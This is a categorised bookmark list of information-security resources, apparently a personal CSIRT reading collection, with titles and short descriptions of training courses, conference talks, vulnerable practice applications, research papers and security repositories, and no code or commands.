SwiftFilter 403 over 4 years ago : Exchange Transport rules to detect and enable response to phishing
The Illustrated TLS Connection : Every Byte Explained and
Practical Cryptography
Thieves and Geeks: Russian and Chinese Hacking Communities
ephemera-miscellany 396 over 6 years ago : Ephemera and other documentation associated with the 1337list project
CleverHans 6,202 8 months ago : An adversarial example library for constructing attacks, building defenses, and benchmarking both
HTTP/3 Explained / -
security 64 almost 7 years ago : Discussion area for security aspects of ECMAScript
Template for Data Protection Impact Assessment (DPIA)
hash collisions 1,475 almost 2 years ago exploitation and other , a
Shodan - A tool for Security and Market Research
Engineering Security : general book about a range of topics in security
Плакаты по информационной безопасности Российской армии (ru) : Russian counter information posters
Kerberos (I) : How does Kerberos work? – Theory
Vulncode-DB project 575 almost 3 years ago : The vulnerable code database (Vulncode-DB) is a database for vulnerabilities and their corresponding source code if available
One-End Encryption (OEE) 196 almost 2 years ago : Stronger than End-to-End Encryption
Automatic SSL with Now and Let's Encrypt
Hacking Digital Calipers
Binary Hardening in IoT products : Last year, the team at CITL looked into the state of binary hardening features in IoT firmware
ZigDiggity 261 about 3 years ago : A ZigBee hacking toolkit by Bishop Fox
Bolstering Security with Cyber Intelligence
Resources-for-Beginner-Bug-Bounty-Hunters 10,763 4 months ago : A list of resources for those interested in getting started in bug bounties
THE DEFINITIVE GUIDE TO ENCRYPTION KEY MANAGEMENT FUNDAMENTALS
Explanatory Reportto the Additional Protocol to the Convention on Cybercrime
PAN-OS GlobalProtect Portal Scanner 123 5 months ago : Determine the Palo Alto PAN-OS software version of a remote GlobalProtect portal or management interface
Thomas Roccia's #100DaysOfCode challenge : IDA pro and a lot of another things
Audi A7 2014 MMI Mishandles the Format-string Specifiers
BoF + Sockets + Erros de Codificação com o Python3 (pt-br)
Yet another SIP003 plugin for shadowsocks, based on v2ray 2,699 19 days ago : A SIP003 plugin based on v2ray
Information Security related Mind Maps
List of Rainbow Tables
Do you hear what I hear? A cyberattack. : CyLab’s Yang Cai is turning network traffic data into music
Ghost in the ethernet optic : A few months ago I stumbled on a tweet pointing out a kind of SFP optic that claimed to be smart, made by a Russian company Plumspace

CSIRT / General / Configs

Kali-Customizations 4 about 5 years ago

CSIRT / Resources

13 Best New Software Security Books To Read In 2021
pwn.college is a first-stage education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. It is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. The philosophy of pwn.college is “practice makes perfect”
'pwnable.kr' is a non-commercial wargame site which provides various pwn challenges regarding system exploitation. the main purpose of pwnable.kr is 'fun'
Pwnable.tw is a wargame site for hackers to test and expand their binary exploiting skills
Security Zines : graphical way of learning concepts of Application & Web Security

CSIRT / Resources / Training and Certifications

OSWE 567 over 2 years ago : OSWE Preparation
AWAE/OSWE : Preparation for coming AWAE Training
AWAE-PREP 859 over 3 years ago : This repository will serve as the "master" repo containing all trainings and tutorials done in preperation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and various courses
offsec_WE 38 about 5 years ago : learning case to prepare OSWE
AWAE-Preparation 236 about 5 years ago : This repository will contain all trainings and tutorials I have done/read to prepare for OSWE / AWAE
From AWAE to OSWE: The Preperation Guide
Awesome Infosec 5,207 9 months ago : A curated list of awesome infosec courses and training resources
Security Certification Progress Chart
study material used for the 2018 CISSP exam 555 almost 4 years ago ,
JustTryHarder 796 almost 2 years ago : a cheat sheet which will aid you through the PWK course & the OSCP Exam. (Inspired by PayloadAllTheThings)
Hacking Your Pen Testing / Red Teaming Career: Part 1
PentesterAcademy : Courses and Online Labs
OSCE-exam-practice 56 over 4 years ago ,
RED TEAM Operator: Malware Development Essentials Course and
OSCP Journey
Hacking Dojo
Learning from your mistakes as an offensive security professional
Burp Suite Academy
The Ultimate List of SANS Cheat Sheets
Posters: Pen Testing
#OSCP exam advice thread.
Targeted Malware Reverse Engineering Workshop
OpenSecurity : We do quality pentests, security engineering, security training and we ♥ OpenSource
OPSEC: In Theory and Practice : Learn OPSEC through historical examples. This introductory course covers OPSEC concepts, theory, and application. You will learn how to critically assess security advice, and how to differentiate between good and bad OPSEC
opsec 96 over 3 years ago : Counter Surveillance and OPSEC research
Guide-CEH-Practical-Master 1,209 about 1 year ago
Understand Kerberos Delegation, Active Directory Security Descriptors, Windows Lateral Movements, etcc.
Free Incident Response Training Plan and . : Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk
CyberDefenders is a training platform focused on the defensive side of cybersecurity, aiming to provide a place for blue teams to practice, validate the skills they have, and acquire the ones they need
OSCP — Meu caminho até a terra prometida. (pt-br)
psylinux 18 about 3 years ago
How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
SOC Core Skills w/ John Strand
awesome-cyber-skills 3,672 5 months ago : A curated list of hacking environments where you can train your cyber skills legally and safely

CSIRT / Resources / Conferences and Slides

H2HC Hackers To Hackers Conference:

CSIRT / Resources / Conferences and Slides / H2HC

H2HC 2017 48 almost 7 years ago : H2HC 2017 Slides/Materials/Presentations
H2HC 2018 36 almost 4 years ago : Slides/Materials/Presentations
JavaDeserH2HC 491 over 2 years ago : Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC)
H2HC 2021

CSIRT / Resources / Conferences and Slides / CCC:

Modchips of the State : Hardware implants in the supply-chain - CCC 2018

CSIRT / Resources / Conferences and Slides / BlackHat:

Cybersecurity as Realpolitik 2014 Keynote: , amazing keynote by Dan Geer (Geertinho)
Kudelski Security's 2018 pre-Black Hat crypto challenge 36 about 6 years ago
Expert demonstrated a new PHP code execution attack 2018:

CSIRT / Resources / Conferences and Slides / BlackHat: / 2021:

supply chain issues talk
MFA-ing the Un-MFA-ble: Protecting Auth Systems' Core Secrets

CSIRT / Resources / Conferences and Slides / DEFCON:

Doublethink 2018: : 8-Architecture Assembly Polyglot by Robert Xiao
SAFEMODE 2020: , , ,

CSIRT / Resources / Conferences and Slides / DEFCON: / 2021:

OpenSOC Blue Team CTF @ DEFCON 29 FAQ
Using Barq to perform AWS Post-Exploitation Actions

CSIRT / Resources / Conferences and Slides

SBSeg 2018 : Simpósio Brasileiro em Segurança da Informação e de Sistemas Computacionais (SBSeg)

CSIRT / Resources / Conferences and Slides / Objective by the Sea (2018):

APFS Internals Jonathan Levin
Protecting the Garden of Eden Patrick Wardle
Code signing flaw in macOS Thomas Reed
From Apple Seeds to Apple Pie Sarah Edwards
When Macs Come Under ATT&CK Richie Cyrus
Crashing to Root Bradon Azad
Leveraging Apple's Game Engine for Advanced Threat Detection Josh Stein / Jon Malm
MacDoored Jaron Bradley
Who Moved my Pixels? Mikahail Sosonkin
Aliens Among Us Michael Lynn

CSIRT / Resources / Conferences and Slides

An Introduction To Binary Exploitation 341 almost 6 years ago BlackHoodie 2018 Workshop:
r2con2020

CSIRT / Resources / Conferences and Slides / r2con2020

workshop: semi-automatic code deobfuscation 76 about 3 years ago
r2con2020 DAY3 Live Stream

CSIRT / Resources / Conferences and Slides

hack.lu :
MISP Summit 05 : MISP Threat Intelligence Summit 0x05 at hack.lu 2019. Practical threat intelligence and information sharing for everyone
Hack.lu 2019 Day #1 Wrap-Up
The Open Source Security Software
Hack.lu 2021 Stonks Socket
How to R&D hacking toys for fun & no-profit
Security Guidelines for Congressional Campaigns
From Assembly to JavaScript and back 20 over 6 years ago (OffensiveCon2018)
ARM-based IoT Exploit Development
Uma Introdução a Threat Intelligence e Threat Hunting para Empresas Sem Orçamento Infinito (pt-br)
Presentations 181 7 days ago Outflank
The Art of De-obfuscation
Smartphone Privacy : How Your Smartphone Tracks Your Entire Life
Fun with LDAP and Kerberos- in AD environments
Analysis and recommendations for standardization in penetration testing and vulnerability assessment
The Second Crypto War—What's Different Now (by Susan Landau, Bridge Professor of Cyber Security and Policy, Tufts University)
Malware: Anti-forensics
The 35C3 halfnarp
SeL4-Enabled Security Mechanisms for Cyber-Physical Systems
Mojave's Sandbox is Leaky
Code Obfuscation 10*2+(2a+3)%2
DeepState : Bringing vulnerability detection tools into the development lifecycle, : DeepState: Symbolic Unit Testing for C and C++
Hardware Memory Tagging to make C/C++ memory safe(r) 11,517 20 days ago
wallet.fail : Hacking the most popular cryptocurrency hardware wallets
Reverse Engineering : Closed, heterogeneous platforms and the defenders’ dilemma Looking back at the last 20 years of RE and looking ahead at the next few SSTIC 2018 -- Thomas Dullien (“Halvar Flake”)
Making C Less Dangerous in the Linux kernel
Workshop-BSidesMunich2018 106 over 6 years ago : ARM shellcode and exploit development - BSidesMunich 2018
REhint's Publications 356 almost 5 years ago
INFILTRATE 2019 Demo Materials 340 over 1 year ago
A Practical Approach to Purple Teaming
The Advanced Threats Evolution: REsearchers Arm Race 356 almost 5 years ago by @matrosov
The Beginner Malware Analysis Course + VirusBay Access
ConPresentations 360 about 1 year ago by Maddie Stone
Venturing into the Dark a review of Dark Side Ops 2: Adversary Simulation
Expert voices disinvited from CyberCon
0x0g-2018-badge 19 over 6 years ago
Virtual Cybersecurity Conferences 116 over 3 years ago : An ongoing list of virtual cybersecurity conferences
The speaker and schedule data for GrayHat to populate Hacker Tracker and the main GrayHat website. 0 over 4 years ago
Offensive Development 241 4 months ago : Post-Exploitation Tradecraft in an EDR World x33fcon 2020
WebSploit Labs workshop hosted by the Red Team Village during YASCON 1 about 4 years ago
The AVAR International Conference is back!
Japan Security Analyst Conference Virtual Edition
{baby,mama,gran}-a-fallen-lap-ray DEFCON 2021 Quals 8 over 3 years ago
Developing Secure Systems Summit (DS3) : The state of the art in developing secure computer systems is advancing rapidly, with progress in several communities around the world spanning the software industry, academia, research labs, and governments
MODERN TECHNIQUES TO DEOBFUSCATE AND UEFI/BIOS MALWARE HITBSecConf2019 -Amsterdam
PoC demo for HITB Amsterdam 2021 2 over 3 years ago : Playing hide-n-seek with AWS GuardDuty: Post-DNS era covert channel for C&C and data exfiltration
Securing Cyber-Physical Systems: moving beyond fear
Speaking materials from conferences 9 over 2 years ago by Tim Scythe
TheGlasshouseCtr
Open Source Security Day on Google Open Source Live
hardik05 32 about 2 years ago : My conference presentations and Materials for them
30th USENIX Security Symposium
The Hijackers Guide to the Galaxy:Off-path Taking over Internet Resources

CSIRT / Resources / Sans / Quiz:

April 2021 Forensic Quiz
May 2021 Forensic Contest
June 2021 Forensic Contest ,

CSIRT / Resources / Sans

Quick Analysis of a Modular InfoStealer
Example of Cleartext Cobalt Strike Traffic
SEC642 papers 3 over 3 years ago : This repository is a collection of papers used in the course that has been deprecated on the wide internet
"Serverless" Phishing Campaign
SANS CTI Summit 2021 102 about 1 year ago
SANS Virtual Summits Will Be FREE for the Community in 2021
Random Forests: Still Useful?

CSIRT / psyops

Read the Pentagon’s 20-Page Report on Its Own Meme
Bezmenov’s Steps (Ideological Subversion)
PAUL LAZARSFELD—THE FOUNDER OF MODERN EMPIRICAL SOCIOLOGY: A RESEARCH BIOGRAPHY
Influence Operations 101 - Media Effects
Hazard Mapping : The information architecture of ethics, a draft proposal
Cognitive Warfare

CSIRT / Sources

hasherezade's 1001 nights

CSIRT / Sources / hasherezade's 1001 nights

How to start RE/malware analysis? | hasherezade's 1001 nights

CSIRT / Sources

List of Helpful Information Security Multimedia 396 over 6 years ago
pocorgtfo 1,315 9 months ago : a "PoC or GTFO" mirror with extra article index, direct links and clean PDFs
FIDO ECDAA Algorithm
stamparm : Miroslav Stampar Repositories (a lot of good stuff)

CSIRT / Sources / Github repos:

gabrielmachado

CSIRT / Sources / Damn Vulnerable Web Application:

Damn Vulnerable Web Application Docker container
Damn Vulnerable Web Application (DVWA) 10,292 14 days ago
Damn Vulnerable C Program 676 about 1 month ago : a c program containing vulnerable code for common types of vulnerabilities, can be used to show fuzzing concepts

CSIRT / Sources

vvmlist : vulnerable virtual machine list is a list of vulnerable vms with their attributes
Source 10 4 months ago Nelson Brito's : This repository is a collection of information, code and/or tool, which I've released and/or presented in some of the most notorious conferences, helping the audience to study and understand some cybersecurity related topics
PwnLab: init (pt-br)
Mamont's open FTP Index : a lot of open FTPs!!!
fuzz.txt 2,884 25 days ago : Potentially dangerous files
Free Training: New Certified Learning Paths : The Qualys Training team is eager to share all of the recent additions to our free training program, as well as provide insight into what is coming in 2019. You can expect to see regular updates as we continue to improve our training offerings!
Catálogo de Fraudes (pt-br) : Lançado em 2008 para alertar a comunidade de ensino e pesquisa sobre os principais golpes em circulação na internet, o nosso Catálogo de Fraudes é hoje um repositório importante de mensagens classificadas como fraudulentas, que serve como fonte de informação para todo o Brasil
Daily Information Security Podcast ("StormCast")
Hackerrank 5 about 3 years ago : Contains codes for some of the solutions to Hacker-rank problems
I may have found Omega Weapon: One Powerful, Terrifying Monster Forming the Upper Reaches of Another, Much More Powerful & Terrifying Monster . #CyberpunkisNow is a project producing Digital Privacy/Anonymity, Counter-Surveillance, Hacking, Technology, Information Security/Cyber Security, Science & Open Source Intelligence content meant to educate, establish/maintain a public dialogue & create awareness regarding the ways technology continues to permeate civilization
Exodus Research Community
2021 Annual Threat Assessment of the us intelligence community
Hamid's Bookmarks 124 10 days ago
EP 67: THE BIG HOUSE DARKNET DIARIES:
Wrong Secrets 1,233 7 days ago : Examples with how to not use secrets
Vulnserver 1,001 about 4 years ago : Vulnerable server used for learning software exploitation

CSIRT / Fun

Spoilerwall introduces a brand new concept in the field of network hardening 761 over 4 years ago
abusing github commit history for the lulz 8,069 25 days ago
resist_oped 201 about 6 years ago : 🕵🏽‍♀️ Identifying the author behind New York Time’s op-ed from inside the Trump White House
InfoSec BS Bingo
How to fit all of Shakespeare in one tweet (and why not to do it!)
Attrition.org : defacement rank
rot8000 : rot13 for the Unicode generation ( )
Reverse Engineering Pokémon GO Plus : TL;DR; You can clone a Pokemon GO Plus device that you own. : github repo
grugq quotes
Pivots & Payloads Board Game : Introducing the NEW SANS Pen Test Poster by SANS Institute
Chess Steganography
Enigma, the Bombe, and Typex 29,255 30 days ago
Ícone da criptografia na 2ª Guerra Mundial, máquina Enigma tem exemplar no Brasil (pt-br)
Enigma machine : This is a simulated Enigma machine. Letters to be encrypted enter at the boundary, move through the wire matrix, and exit
How I hacked modern Vending Machines
A better zip bomb
Goodbye-World 59 about 6 years ago : The last program that every developer writes
Dumb Password Rules 2,990 18 days ago
Enigma I , Navy M3/M4
FYI, I'm going to drive home on Florida's Turnpike with a code that QR-enabled license plate readers will log in their ASCII databases ... which could trigger #antivirus software to QUARANTINE those databases by Rob Rosenberger
pivoting (pt-br)
Posters, drawings... 10,521 9 months ago
"Other good cyberpunk media to stream free on Tubi: Akira https://t.co/zNFOXzkdMP Ghost in the Shell https://t.co/ayGKJsGXsf Jin-Roh https://t.co/V6KUA0icSc Ergo Proxy https://t.co/uQv9WNGnHT AD Police https://t.co/UNBioD26MB Chappie https://t.co/YmLabtxk4z"
THE BEIRUT BANK JOB
BitmapFonts 1,781 almost 4 years ago : My collection of bitmap fonts pulled from various demoscene archives over the years
types of papers XKCD : ,
Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data.
How the Xbox 360 DVD Security was Defeated and - MVG
I was going through my notes this morning and thought CVE-2021-21985 was important to cover
APPSEC EZINE
ZeroVer: 0-based Versioning
The Cartoon Guide to Computer Science
LENS CALCULATOR : alculate CCTV camera lens focal length, pixel density and camera zones in 3D
Awesome Piracy 24,325 over 1 year ago : A curated list of awesome warez and piracy links
An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1
What is von Clausewitz centers of gravity (cogs) concept?
Place that a stealth figther was caught on gmaps
High-Security Mechanical Locks
Tetsuji : Remote Code Execution on a GameBoy Colour 22 Years Later
KeyDecoder 3,061 10 months ago app lets you use your smartphone or tablet to decode your mechanical keys in seconds
Comparative Study of Anti-cheat Methods in Video Games by Samuli Lehtonen

CSIRT / Articles

The Accidental Altruist: Inferring Altruism from an Extraterrestrial Signal
Interstellar communication. IX. Message decontamination is impossible
[1808.00659] Chaff Bugs: Deterring Attackers by Making Software Buggier
[1809.08325] The Rise of Certificate Transparency and Its Implications on the Internet Ecosystem
DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution
Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities
The Hunt for 3ve : Taking down a major ad fraud operation through industry collaboration
Page Cache Attacks : We present a new hardware-agnostic side-channel attack that targets one of the most fundamental software caches in modern computer systems: the operating system page cache
Identification and Illustration of Insecure Direct Object References and their Countermeasures
China’s Maxim : Leave No Access Point Unexploited: The Hidden Story of China Telecom’s BGP Hijacking
Listen to Your Key: Towards Acoustics-based Physical Key Inference
Mailto: Me Your Secrets. On Bugs and Features in Email End-to-End Encryption
Everything Old is New Again: Binary Security of WebAssembly
Discovering Suspicious APT Behaviors by Analyzing DNS Activities
Harvard Belfer National Cyber Power Index 2020
Quantum Blockchain using entanglement in time
Reflections on Trusting Trust
I See Dead µops: Leaking Secrets via Intel/AMD Micro-Op Caches
BIAS: Bluetooth Impersonation AttackS
LOKI: Hardening Code Obfuscation Against Automated Attacks
FPGA-Based Near-Memory Acceleration of Modern Data-Intensive Applications

CSIRT / Other Repos

mubix 94 about 3 years ago